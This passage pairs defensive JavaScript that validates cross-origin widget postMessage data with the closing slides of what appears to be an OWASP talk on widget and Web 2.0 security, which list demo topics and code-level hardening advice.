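  if (msg === null || typeof msg !== 'object' || typeof msg.type !== 'string') {
    return { accepted: false, reason: 'malformed message' };
  }
  switch (msg.type) {
    case 'resize': {
      const h = Number(msg.payload);
      if (!Number.isFinite(h) || h < 0 || h > MAX_HEIGHT) return { accepted: false, reason: 'bad height' };
      return { accepted: true, action: 'setFrameHeight', value: Math.floor(h) };
    }
    case 'feed-updated': {
      // Titles are rendered later with textContent, so they stay text; cap the count.
      const titles = Array.isArray(msg.payload)
        ? msg.payload.filter(t => typeof t === 'string').slice(0, MAX_TITLES)
        : [];
      return { accepted: true, action: 'renderTitles', value: titles };
    }
    default:
      return { accepted: false, reason: 'unknown message type ' + msg.type };
  }
}

// In the host page: window.addEventListener('message', e => apply(handleWidgetMessage(e)));
// and the widget posts with an explicit target rather than '*':
//   parent.postMessage({ type: 'resize', payload: 640 }, 'https://host.example.com');   // assumed host origin

console.log(handleWidgetMessage({ origin: 'https://widgets.example.net', data: { type: 'feed-updated', payload: ['Headline one', 'Headline two'] } }));
console.log(handleWidgetMessage({ origin: 'https://unrelated.example', data: { type: 'resize', payload: 100 } }));
```

The same two checks apply to the Flash-based widgets the slide mentions when they bridge to JavaScript through ExternalInterface: a separate origin for the SWF, and the host validating what crosses the bridge.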
  • 63. Demo Cross Widget Spying Using DOMScan to review Widget Architecture and Access Mechanism RSS Feed Hacking Mashup Hacks Cross Domain Callback Hacking OWASP 63
  • 65. Security at CODE Level JS, Flash or XAP should not carry server side logic – they should be presentation layer only … Obfuscation may help a bit – not foolproof. Source code and object code analysis is required during blackbox testing. Resource discovery and fuzzing – a must for SOAP, JSON and AMF streams. Be careful with HTML 5 implementation. DOM based scanning and analysis is required. Cross streams and third party analytics OWASP 65
  • 66. http://shreeraj.blogspot.com shreeraj@blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 66